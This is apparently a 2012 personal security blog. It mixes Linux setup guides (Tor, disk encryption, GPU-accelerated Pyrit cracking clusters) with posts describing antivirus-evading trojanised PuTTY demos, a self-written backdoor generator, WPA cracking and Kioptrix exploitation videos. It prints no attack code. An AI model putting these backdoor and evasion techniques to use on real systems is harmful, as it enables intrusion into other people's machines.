This video is talking about virus and the damage. The victims are almost Windows systems. The video also talking about botnets and DDoS. They also think that some powerful virus are created by China.

By the way, this video also introduces what is Black Hat, Grey Hat and White Hat.



That's all! See you.

Hackers : Outlaws and Angels

This an inside story about hackers on the both sides - outlaws and angels which is talking about hackers (White Hat and Black Hat). It is a bit out-dated (around the year of 2002) but it is still worth to watch, in my opinion.

Hacking means finding out weaknesses in a computer or computer network, though the term can also refer to someone with an advanced understanding of computers and computer networks. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge. The subculture that has evolved around hackers is often referred to as the computer underground but it is now an open community. While other uses of the word hacker exist that are not related to computer security, they are rarely used in mainstream context. They are subject to the long standing hacker definition controversy about the true meaning of the term hacker. In this controversy, the term hacker is reclaimed by computer programmers who argue that someone breaking into computers is better called a cracker, not making a difference between computer criminals (black hats) and computer security experts (white hats). Some white hat hackers claim that they also deserve the title hacker, and that only black hats should be called crackers.

"Learn to hire a thief to try to steal something, don't hire a cop." (at 16:50)

"The battle between the angels and outlaws seem sat to continue. But hackers on the both sides know that like many conflicts, they between both of the people speak the same language, use the same tools and play the same game." (at 47:58)



That's all! See you.

Friday, July 06, 2012

NEWS : Latest message from LulzSec

I think someone out there should heard about LulzSec.

The below statement is copied from Wikipedia :

"Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claimed responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline."

The following is believed to be the latest message from LulzSec :

LulzSec: All your base are belong to us



Just for information. Nothing else.

That's all! See you.

Saturday, June 30, 2012

HOWTO : Protect you from being ARP spoofing

Updated on Dec 4, 2014.

ARP spoofing is a kind of Man-in-the-Middle (MiTM) attack and it affects the machines in the subnet.

Who will affected? Almost all. Free wifi connection even it is encrypted by WPA/WPA2. Your local network. The machines inside a subnet.

How about using SSL and SSH as well as VPNs? No, those cannot protect you from being attacked by ARP spoofing. Even a switch cannot protect you from being attacked. Please refer to this presentation.

ARP security often ignored and nobody cares about lower layer security nowadays. ARP attacks are real threat with high impact.

How can I protect myself from being attacked? Yes, you can. The following tools will alert you when the attack is taking place.

If you are Linux users, you can use ArpON. If you are Windows users, you can use XARP - Advanced ARP Spoofing Detection.

For Ubuntu or Debian users, you can install it by the instruction at ArpON on Kali Linux 1.0.9a.

If you are Mac OS X users, you can use ARP Guard. ArpON on Mac OS X Yosemite 10.10.1

If you are Android users, you can use WiFi ARP Guard.

ArpON for Linux can protect you from the attacks and the others are just alert you for the attacks only. In addition, ARP Guard costs money while the others are free of charge.

Or, if you do not want to install the captioned software and your router can set static ARP, do it and your subnet is protected upon set.

Please note that ARP Guard for Mac OS does not do the job well. It cannot detect any ARP spoofing when I test it on Mac OS X 10.10.1.

There is another way to protect your from ARP spoofing attack if you are a Linux user and do not want to install the captioned software. You can follow the instructions in the following video which was created by xiedi01 :



Want to see a demo how ARP spoofing works? Yes, the demo is by Hak5 and it starts at 07:24 for the first demo.





The following demo is conducted under Back|Track 5 R2 by MasterButcher68.



There are some tools that make this attack automatically and the attackers requires no skill to do so. Even a script kiddies can handle it. The following is one of the tools, namely YAMAS - Yet Another Man in The Middle Automation Script.



That's all! See you.

Tuesday, June 19, 2012

HOWTO : BackTrack 5 R2 on Intel X79 Express and nVidia display cards (The better way)

Uninstall the manual installed driver

Previous HOWTO is here.

If you followed the previous HOWTO to install the nVidia driver, you can uninstall it by the following command :

./NVIDIA-Linux-x86-295.20.run --uninstall

The better way to install nVidia driver

Step 1 :

add-apt-repository ppa:ubuntu-x-swat/x-updates

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

Step 2 :

Reboot your system.

After reboot, you issue the following command :

nvidia-xconfig
splash-fix

Then, reboot your system again.

If you install the nVidia driver this way, you are not required to reinstall the driver after the kernel is updated.

You can follow the other parts of tutorial in the previous HOWTO for sample code of CUDA and Pyrit.

That's all! See you.

Wednesday, June 06, 2012

HOWTO : VPN (PPTP) on BackTrack 5 R2

Step 1 :

apt-get update
apt-get dist-upgrade


apt-get install network-manager-gnome network-manager-pptp

Step 2 :

cp /etc/network/interfaces /etc/network/interfaces.bak

nano /etc/network/interfaces

Delete all entries but left the first two lines behind.

auto lo
iface lo inet loopback


Step 3 :

service network-manager start

Step 4 :

System >> Startup Applications >> Network Manager

Append "&" on the end of the Command. It will be looked like this :

nm-applet --sm-disable &

Make sure Start dhclient is enabled in the menu of Startup Applications.

Reboot the system and then configure your VPN (PPTP) as usual.

Make sure Advanced >> Use Point-to-Point encryption (MPPE) is enabled in the Configuration of PPTP.

That's all! See you.

Tuesday, May 22, 2012

HOWTO : Flash-Aid 2.2.3 for Ubuntu

Do you encounter blue faces or wrong colour displayed on the YouTube videos on your Ubuntu 12.04 box? If yes, I recommend you to install Flash-Aid which can solve the problem.

Open your Firefox and go to here to install the plugin. Once the plugin is installed, you can click on the icon on the right top hand corner to install the correct Flash.

The official wording of Flash-Aid :

Remove conflicting flash plugins from Ubuntu/Debian Linux systems, install the appropriate version according to system architecture and apply some tweaks to improve performance and fix common issues.

That's all! See you.

UPDATED on May 23, 2012 :

If your problem is still there and you have nVidia display card with "libvdpau1" installed, you should follow the steps below to solve the problem.


sudo add-apt-repository ppa:tikhonov/misc
sudo apt-get update
sudo apt-get install libvdpau1


This solution is workable on Ubuntu 12.04 LTS with flashplugin-installer 11.2.202.235ubuntu0.12.04.1 but not with Flash-Aid 2.2.3.

HOWTO : Cracking WPA/WPA2 without dictionary

This video is not created by me. It is created by Kardipapa. The original video is here.

I upload here for my reference only.



That's all! See you.

UPDATED on May 22, 2012 :

The following links are my Proof of Concept (PoC) that written on April 16, 2010 and May 22, 2011 respectively. Kardipapa confirmed my Proof of Concept is workable.

Using John the Ripper (which is written by me on April 16, 2010 for my Proof of Concept) :

HOWTO : Crack WPA/WPA2-PSK with John the Ripper

Using Crunch and Pyrit (which is written by me on May 22, 2011 for my Proof of Concept) :

HOWTO : WPA/WPA2 cracking with Back|Track 5

HOWTO : Scapy 2.2.0 on Ubuntu 12.04 LTS

To install Scapy

sudo apt-get update sudo apt-get install python-scapy python-pyx python-gnuplot

To run Scapy interactively

sudo scapy

The scapy shell will be displayed :
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>>


To quit Scapy

>>>quit()
That's all! See you.

Tuesday, May 01, 2012

HOWTO : VulnImage (Manual & Automated)

These videos are not created by me, they are created by g0tmi1k. Please credit to him.

The amazing method is Manual and you can find the original post at here. It is talking about exploit development on the fly.

The automated method is here.

You can download the VulnImage at here.


Manual Method

Automated Method

That's all! See you.

HOWTO : Kioptrix 4 (Level 1.3)

The following videos are not created by me. They are created by one of my mentors, g0tmi1k. I re-post here for reference. Please credit to g0tmi1k.

To get Kioptrix 4 (Level 1.3) at here.

To find some hints and solutions, please refer to g0tmi1k's blog at here

g0tmi1k find three different ways to compromise the Kioptrix, here you are (Enjoy!!!) :


SQL Injection

Local File Inclusion


Limited Shell



That's all! See you.

Wednesday, April 11, 2012

Undetectable Trojan on Windows 7 SP1 and AVG Anti-Virus Free Edition 2012

Maybe someone out there think that their systems are safe when anti-virus programs are installed and the firewall is enabled. However, it is not true.

This video is to proof that anti-virus program and firewall can be bypassed. This video is going to WARN you all NOT to download any pirate software and cracked software as well as NOT to download any software from any untrusted source.

The technique used in the video can be used in any file format, such as video, pdf, photo/picture, audio and executable file.

About the video

The demo Windows 7 SP1 in the video is in default settings upon installed.

- Windows 7 SP1 is fully updated as on April 11, 2012.
- AVG Anti-Virus Free Edition 2012 is installed and fully updated as on April 11, 2012.
- UAC is set to default on Windows 7 SP1.
- Firewall is enabled and no extra program is allowed (default settings).
- AVG Anti-Virus Free Edition 2012 has no whitelist set

As a result, the Trojan Injected PuTTY program is undetected by AVG Anti-Virus program and UAC/Defender on Windows 7 SP1 as well as firewall.



That's all! See you.

Undetectable Trojan on Windows 7 and AVG Anti-Virus

Maybe someone out there think that their systems are safe when anti-virus programs are installed and the firewall is enabled. However, it is not true.

This video is to proof that anti-virus programs and firewalls can be bypassed. This video is going to WARN you all NOT to download any pirate software and cracked software as well as NOT to download any software from any untrusted source.

The technique used in the video can be used in any file format, such as video, pdf, photo/picture, audio and executable file.

About the video

The demo Windows 7 in the video is in default settings upon installed.

- Windows 7 is fully updated as on April 10, 2012.
- AVG Anti-Virus is installed and fully updated as on April 10, 2012.
- UAC is set to default on Windows 7.
- Firewall is enabled and no extra program is allowed (default settings).
- AVG Anti-Virus has no whitelist set

As a result, the Trojan Injected PuTTY program is undetected by AVG Anti-Virus program and UAC/Defender on Windows 7 as well as firewall.



That's all! See you.

Wednesday, March 28, 2012

HOWTO : Anonymously using The Onion Router (Tor)

Part A - Installation of Tor

(A1) Ubuntu or BackTrack 5 R2

Step 1 :

sudo add-apt-repository ppa:ubun-tor/ppa
sudo apt-get update
sudo apt-get install tor tor-geoipdb privoxy vidalia


Step 2 :

sudo nano /etc/privoxy/config

Append the following line :

forward-socks5 / 127.0.0.1:9050 .

sudo /etc/init.d/privoxy start
sudo /etc/init.d/tor start


Step 2a (Optional) :

If you are behind firewall or NAT as well as router, you should append the following line at the configure file.

forward 192.168.*.*/ .

Step 3 :

Go to the Tor official site to download and install Tor button for Firefox.

https://www.torproject.org/dist/torbutton/torbutton-current.xpi

(A2) Windows 7

Download the current version of Tor Browser Bundle 2.2.35-8.

https://www.torproject.org/dist/torbrowser/tor-browser-2.2.35-8_en-US.exe

Extract it and placed the files inside a folder and make a shortcut on the desktop.

Part B - Installation of xChat

(B1) Ubuntu or BackTrack 5 R2

Step 4 :

dig +short irc.tor.freenode.net cname

The result is :

p4fsi4ockecnea7l.onion.

sudo nano /etc/tor/torrc

Append the following line.

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 5 :

sudo /etc/init.d/tor restart

sudo apt-get install xchat

Step 6 :

If you already have your username in Freenode, you can skip this this step.

/msg nickserv register [password] [email]

/msg nickserv set hidemail on

Step 7 :

At the xChat, go to "Settings" | "Preferences" | "Network" | "Network setup" | "Proxy server", enter :

Hostname : 127.0.0.1
Port : 9050
Type : Socks5
Use proxy for : IRC Server Only


Step 8 :

Create a new server "TorifiedFreenode" at xChat of the server list.

Press "Add" and then fill it as "10.40.40.40".

Step 9 :

Download the cap_sasl_xchat.pl at http://lwsitu.com/xchat/cap_sasl_xchat.pl and save it at ~/.xchat2 and make it executable.

Step 10 :

At the status windows of xChat :

/sasl set TorifiedFreenode [your_Freenode_Nickname] [your_Nick_password] PLAIN

Step 11 :

Block CTCP and DCC commands and inquiries that sent to your IRC client software :

/ignore *!*@* CTCP DCC
/ignore * CTCP DCC

/set irc_hide_version ON
/set dcc_auto_chat 0
/set dcc_auto_resume OFF
/set dcc_auto_send 0


(B2) Windows 7

Step 12 :

Download the xChat at http://www.silverex.org/download/ and then install it.

Step 12a :

At the Vidalia Control Panel, select "Settings" | "Advanced" | "Edit current torrc", append the following line :

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 13 :

Download the ActivePerl version 5.12.4.1205 at http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.12.4.1205/ActivePerl-5.12.4.1205-MSWin32-x86-294981.msi

Step 14 :

Download the xcperl5.12.1.dll at http://lwsitu.com/xchat/xcperl5.12.1.dll

Then save it at c:\Program Files (x86)\X-Chat 2\plugins. And delete the xcperl.dll after that.

Step 15 :

Follow the above Step 6 to 11.

Part C - Installation of Filezilla

(C1) Ubuntu and BackTrack 5 R2

Step 16 :

sudo apt-get update
sudo apt-get install filezilla


Step 17 :

Open Filezilla, go to "Edit" | "Settings" | "Generic proxy" :

Select "Socks5"

proxy host : 127.0.0.1
proxy port : 9050



(C2) Windows 7

Step 18 :

Download the current Windows version :

http://filezilla-project.org/download.php?type=client

Then follow the above Step 17.

Part D - Using Tor in Console

Ubuntu and BackTrack 5 R2 only.

Step 19 :

sudo apt-get update
sudo apt-get install proxychains elinks


Step 20 :

sudo nano /etc/proxychains.conf

Change the following line :

socks4 127.0.0.1 9050

To :

socks5 127.0.0.1 9050

Step 21 :

Usage -

proxychains nmap google.com
proxychains elinks cmyip.com
proxychains elinks www.whatismyip.com


That's all! See you.

Saturday, March 10, 2012

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

Credit to : Infosec Ramblings and Hak5.org

Step 1 :

The hard drive partitioning is as the following :

/dev/sda1 for /boot
/dev/sda5 for /

Assume the hard drive is band new.

fdisk /dev/sda
n
p
1
+4G
n
e
2
n
l
p
w


* where +4G is set to 4GB for the /dev/sda1 as /boot. You can set it to +1024M or smaller.

Step 2 :

cryptsetup -y -c aes-xts-plain -s 512 luksFormat /dev/sda5
cryptsetup luksOpen /dev/sda5 haktop


* where haktop is the device label

Step 3 :

mkfs.ext2 /dev/sda1
mkfs.ext4 /dev/mapper/haktop


Step 4 :

Install BackTrack 5 R2 as is. However, select custom partitioning. Do not format the partitions. Select /dev/mapper/haktop as ext4 and / while select /dev/sda1 as ext2 and /boot.

Make sure the bootloader is installed at /dev/sda.

Step 5 :

Once the installation is completed, select "Continue testing" and do not reboot the system.

mkdir /mnt/haktop

mount /dev/mapper/haktop /mnt/haktop/
mount /dev/sda1 /mnt/haktop/boot

chroot /mnt/haktop/

mount -t proc proc /proc
mount -t sysfs sys /sys/


Step 6 :

Get the UUID of sda5 by opening another terminal :

blkid /dev/sda5

Copy down the UUID of the /dev/sda5.

nano /etc/crypttab

haktop /dev/disk/by-uuid/<UUID Key> none luks

Step 7 :

nano /usr/share/initramfs-tools/scripts/local-top/cryptroot

Locate the following :

# Try to get a satisfactory password $crypttries times
   count=0
   while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do


Change to :

count=0
echo "Unlocking the disk $cryptsource ($crypttarget)"
while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do


Locate the following :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Unlocking the disk $cryptsource ($crypttarget)\nEnter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then


Change to :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Enter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then


Step 7a :

update-initramfs -u

fix-splash

Now, reboot the system. The bootup will halt at the wallpaper of BackTrack 5. Just press F8 and deleted the prompted "****" and then enter your passphrase to boot the system.

Or, you can just key in the passphrase when the bootup process is stopped at the wallpaper.

Step 8 : (Optional)

If you do not want to press F8, you can delete the "splash" from the following line.

nano /boot/grub/grub.cfg

Locate the following :

linux /vmliunx-3.2.6 root=/dev/mapper/haktop ro text splash vga=791

To make it look likes :

linux /vmliunx-3.2.6 root=/dev/mapper/haktop ro text vga=791

Then, you will be prompted for entering your passphrase on every boot up.

Step 9 :

After the system is boot up, it is required to create swap file.

dd if=/dev/zero of=/swapfile1 bs=1M count=8192

* Where count=8192 is 8GB

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0


Then reboot the system.

See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick


That's all! See you.

Friday, March 09, 2012

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick

Credit to : Hak5.org

Step 1 :

To check the device label :

sfdisk -l /dev/sda
sfdisk -l /dev/sdc


*** Where sda is my hard drive and sdc is the USB stick

Step 2 :

To format the following devices with linux format :

fdisk /dev/sda
d
n
p
1
p
w


fdisk /dev/sdc
d
n
p
1
p
w


Step 3 :

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/first.key

cryptsetup -c aes-xts-plain -s 512 luksFormat /dev/sda1 /tmp/first.key

cryptsetup -d /tmp/first.key luksOpen /dev/sda1 mylaptop

ls /dev/mapper


Step 4 :

mkfs.ext2 /dev/sdc1

mkfs.ext4 /dev/mapper/mylaptop


*** Where mylaptop is the label of the device.

Step 5 :

Install BackTrack 5 R2 as usual. However, do not format the partitions. Select /dev/mapper/mylaptop as ext4 and /. Then, select /dev/sdc1 as ext2 and /boot.

After that, make sure the bootloader is installed at /dev/sdc

Step 6 :

Once the installation is completed, select "Continue testing" and do not reboot.

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/second.key

Make sure the keys are different.

sha1sum /tmp/*key

Step 7 :

cryptsetup -d /tmp/first.key luksAddKey /dev/sda1 /tmp/second.key

mkdir /mnt/mylaptop

mount /dev/mapper/mylaptop /mnt/mylaptop/
mount /dev/sdc1 /mnt/mylaptop/boot

chroot /mnt/mylaptop/

mount -t proc proc /proc
mount -t sysfs sys /sys/


Step 8 :

nano /etc/crypttab

blkid /dev/sda1

mylaptop /dev/disk/by-uuid/<UUID Key> none luks

nano /etc/fstab

/dev/sdb1 /boot ext2 defaults 0 2


Step 9 :

After that, boot BackTrack 5 R2 from the USB stick. It will drop to the busybox.

At the busybox, enter the following commands to unlock the partition. You are required to enter these commands on every boot up.

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop


Then press Ctrl-D to continue the boot process.

Step 10 :

After the system is boot up, it is required to create swap file.

dd if=/dev/zero of=/swapfile1 bs=1M count=512

* Where count=512 is 512M

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0


Then reboot the system.

Remarks :

You are required to enter these commands on every boot up.

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop


See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

That's all! See you.

HOWTO : Pyrit Cluster with BackTrack 5 R2

Install nVidia CUDA drivers and Pyrit as described here

(A) The server (with the GPUs) Settings

At least run the pyrit once and you will have the following file at ~/.pyrit/config.

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients =
rpc_server = false
workunit_size = 75000


If your system is enabled Hyper-Threading, the "limit_ncpus" should be set to the number of the real CPU cores. For example, my system have 6 real CPU cores and HT is enabled, the setting will be as the following :

limit_ncpus = 6

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)


Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)


(B) The client (without or with GPUs) Settings

Client is not required to install nVidia drivers. Just install the BackTrack 5 R2 as is. However, if you client has nvidia display card installed, you should install the nVidia drivers as the captioned mentioned.

The following settings should be set on every client machine.

At least run the pyrit once and you will have the following file at ~/.pyrit/config.

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.0.100
rpc_server = true
workunit_size = 75000


** if you have more than one server, you should set it to (where the IP addresses are the IP address of your servers) :

rpc_knownclients = 192.168.0.100 192.168.0.150

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)


Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)


(C) How to run

On the server

pyrit serve

On the client

pyrit benchmark

Remarks :

I have tested this settings on my system with VirtualBox client. The performance of the Pyrit dropped about by half. It is because the VirtualBox client is not on a real network and the CPUs of the VirtualBox client are not real.

By the way, the performance of the cluster will be dropped a lot even in a home gigabit network environment - ThinkPad X100e (AMD CPU with no GPU). I think Pyrit is not very good at network environment at this moment and the CPU power of the client does matter too.

That's all! See you.

Thursday, March 08, 2012

HOWTO : BackTrack 5 R2 on Intel X79 Express and nVidia display cards chipset

UPDATE : The better way is here.

Hardware

CPU : Intel i7-3930K (Socket 2011, 12 cores with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R2

BackTrack 5 R2 can be boot up on Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards. However, "nomodeset" should be applied to the boot option by pressing "tab" on the boot menu.

Install the BackTrack 5 R2 as usual. When it is required to reboot, do not remove the BackTrack 5 R2 CD. Boot up the CD accordingly. After the BackTrack 5 R2 is booted up, mount the hard drive and add "nomodeset" to boot option of the grub.cfg at /boot/grub.

After that, reboot the system and remove the CD. The system will be boot into BackTrack 5 R2 without problem.

If the kernel is upgraded, you should rebuild the kernel headers by the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/


Installation of nVidia display driver

Go to nVidia Deleloper Zone CUDA Toolkit 4.1 to download the following. Do not enter to X11 by issuing "startx"; otherwise, the installation will be failed.

(1) Download "Latest Drivers for Linux (295.20)" for the nVidia Driver. You can download the driver before not going to the X11.

32-bit :
http://www.nvidia.com/object/linux-display-ia32-295.20-driver.html

64-bit :
http://www.nvidia.com/object/linux-display-amd64-295.20-driver.html

Installation :

32-bit :
chmod +x NVIDIA-Linux-x86-295.20.run
./NVIDIA-Linux-x86-295.20.run


64-bit :
chmod +x NVIDIA-Linux-x86_64-295.20.run
./NVIDIA-Linux-x86_64-295.20.run


After that, you can reboot your system.

Then run the following command to make the suitable resolution :
nvidia-xconfig

(2) Download "CUDA Toolkit for Ubuntu Linux 10.04" for the CUDA Toolkit.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_32_ubuntu10.04.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu10.04.run

chmod +x http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_xx_ubuntu10.04.run

*** Accept the default settings.

(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/sdk/gpucomputingsdk_4.1.28_linux.run

chmod +x gpucomputingsdk_4.1.28_linux.run
./gpucomputingsdk_4.1.28_linux.run


nano /root/.bashrc

Append the following :

PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64
export PATH
export LD_LIBRARY


source /root/.bashrc
ldconfig


After that, reboot the system to make the nVidia driver effect.

Compile Sample code of CUDA

apt-get install freeglut3-dev libxi-dev libXmu-dev

cd NVIDIA_GPU_computing_SDK/C
make


Then, run the sample codes at :

cd NVIDIA_GPU_computing_SDK/C/bin/linux/release
./deviceQuery
./nbody


Installation of pyrit

Add the following to /etc/apt/sources.list :

deb http://security.ubuntu.com/ubuntu lucid-security main
apt-get update
apt-get libssl-dev scapy python-dev

Then, delete the newly added entry of the sources.list.

apt-get update

Go to the official site of pyrit.

cd ~
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit

cd pyrit
python setup.py build
python setup.py install


cd cpyrit
python setup.py build
python setup.py install


To test if the installation is correct or not.

pyrit list_cores
pyrit benchmark
pyrit benchmark_long


Remarks :

Fix the splash :
fix-splash

Install the sensors :
apt-get install sensors-applet

Pyrit Cluster Setup
John the Ripper Cluster Setup

See Also : HOWTO : Pyrit Cluster with BackTrack 5 R2

*** Whenever the linux kernel is updated or upgraded, the nVidia driver should be required to reinstalled to match the upgraded kernel version.

That's all! See you.

Before water cooling



After water cooling

Friday, February 24, 2012

Course Review - Offensive Security Wireless Attacks (WiFu)

The Background

After passing the OSCP, I enrolled for the Offensive Security Wireless Attacks (aka WiFu) course. This course is talking about how to attack a wireless rotuer no matter it is set to WEP, WPA or WPA2.

The Hardware

You are required to have at least one wireless device to act as victim (laptop with wireless card or smartphone, such as Android or iPhone) and a computer which is installed with BackTrack 5 R1 as an attacker. The attacker machine is recommended to have a USB adaptor (the USB adaptors that recommended on the official site). If you do not have wireless device as victim, you may consider to buy a wireless USB dongle for your desktop.

Furthermore, you are also required to have a wireless router or access point that equipped with WEP and WPA/WPA2 features (the models are recommeded on the official site).

Beware that not all the wireless dongles or wireless cards can be injected and in monitor mode. In addition, some wireless routers behaved unexpectedly when doing the attacks. For example, my dd-wrt flashed TP-LINK TL-WR1043ND do not perform some of the attacks, such as Korek Chopchop attack. However, not all access points can perform Korek Chopchop attack indeed. Therefore, the suggested hardwares in the official website are recommended to buy.

At the time of this writing, Netgear WNR1000v2h2 N150 can be bought in Hong Kong and it is not so expensive. However, I am not sure if this model is the one stated in the official site. You should not upgrade the firmware but you should downgrade it to v1.0.1.1 as the other version of firmwares do not provide WEP function. The older firmware can be downloaded from the Netgear official site.

My hardwares for the lab are as the following. Hope they can give you some idea :
(1) Access Point - TP-LINK TL-WR1043ND (flashed with dd-wrt v24-sp2 18024) (can be injected)
(2) Access Point - Netgear WNR1000v2h2 N150 (firmware v1.0.1.1)
(3) Victim - Google Nexus One (Android 2.3.6)
(4) Victim - TP-LINK TL-WN321G (54Mbps, Ver 4.1) (can be injected and in monitor mode)
(5) Victim - TP-LINK TL-WN821N (300Mbps, Ver 3.1) (can be injected and in monitor mode)
(6) Attacker - Cloned ALFA Networks AWUS036H USB 500mW (Realtek RTL8187L)

The Course

This course, version 3.0, is designed for beginners. It teaches you the wireless concept and its weakness. The most mentioned tool is Aircrack-NG Suite but it also mentioned others, such as tool that using GPUs for the brute forcing and other advanced tools. However, it does not cover the WPA/WPA2-Enterprise attack.

Offensive Security does not provide any lab for your access. You are required to set up your lab for practice. The hardwares that mentioned above are required for setting up your own lab.

The Challenge

The four hours challenge requires you to SSH to a BackTrack box in order to complete the objectives. After the challenge, you are required to submit your report within 24 hours.

Finally, the exam was over. Within 3 business days, I received an email which informed me that I passed the challenge. If you passed the challenge, you will be an Offensive Security Wireless Professional (OSWP). I am an OSWP now!

The Conclusion

In conclusion, this course will teach you all the basic wireless cracking.

Sunday, February 12, 2012

Automatic Backdoor Generator for Windows System

Astr0baby developed an automatic tools to generate a backdoor for Windows system.

Later, www.coresec.org modified his work to make it workable on Back|Track 5. So, I made the modified source code available at here.

Then, I slightly modified coresec.org's work and make a video at here for reference.



The evasion of anti-virus of the captioned generated file is not too good as some of the users posted the generated file to the free anti-virus scanners on the web and/or local anti-virus programs to confirm if it can be detected or not. The problem is that the free scanners on the web will submit the code to their companies for further analysis. So, their detection rate will be higher, just a kind of honeypot. Therefore, if you want to test the generated file locally, please make sure the box cannot surf the internet as the result will be submitted to the anti-virus company after the scan.

I found generation of backdoor automatically is quite interesting. I completely rewrite the code and it can embedded to an executable file. The code can do some simple input data validation too. The current version is 0.2 at the time of this writing. I made a video for the demo. However, the code will not be available at the moment as I am still consider to release the source code or not.



PDFs and image files can also be embedded backdoor to them in the similar way. Therefore, do not download any programs, PDFs and image files from any untrusted sources. Especially, any cracked softwares and free licensed ebooks are to be alerted. This does not only affected Windows system, Linux or Mac OS can be infected too.

That's all! See you.

Sunday, February 05, 2012

HOWTO : FreeNAS 8.0.3 RELEASE p1 USB device boot bug fix

The Problem

When I upgraded my FreeNAS to the latest version FreeNAS 8.0.3 RELEASE p1, it refused to boot and stop at the following message.

mountroot> GEOM: da0s1: geometry does not match label (16h,63s != 255h,63s).
GEOM: da0s2: geometry does not match label (16h,63s != 255h,63s).


I typed the following command and it boots fine.

ufs:/dev/da0s1a

The problem is that I need to type the captioned command on each boot up. How to solve this problem? Yes, I can.

The Solution

After the system is booting up and a menu is displayed. Select "9) Shell" to go to the shell prompt where we can do the following.

Step 1 :

nano /etc/fstab

Change from :
/dev/ufs/FreeNASs1a / ufs ro 1 1

To :
/dev/ufs/FreeNASs1a / ufs rw 1 1

Step 2 :

Then, save and exit the editor. Execute the following command :

mount -a

Step 3 :

Next, open up another file :

nano /boot/loader.conf

Change from :
#Fix booting from USB device bug
kern.cam.boot_delay=10000


To :
#Fix booting from USB device bug
kern.cam.boot_delay=20000


Save and exit the editor. Then reboot. This time, the boot up is much slower than before but it works. Problem solved!

That's all! See you.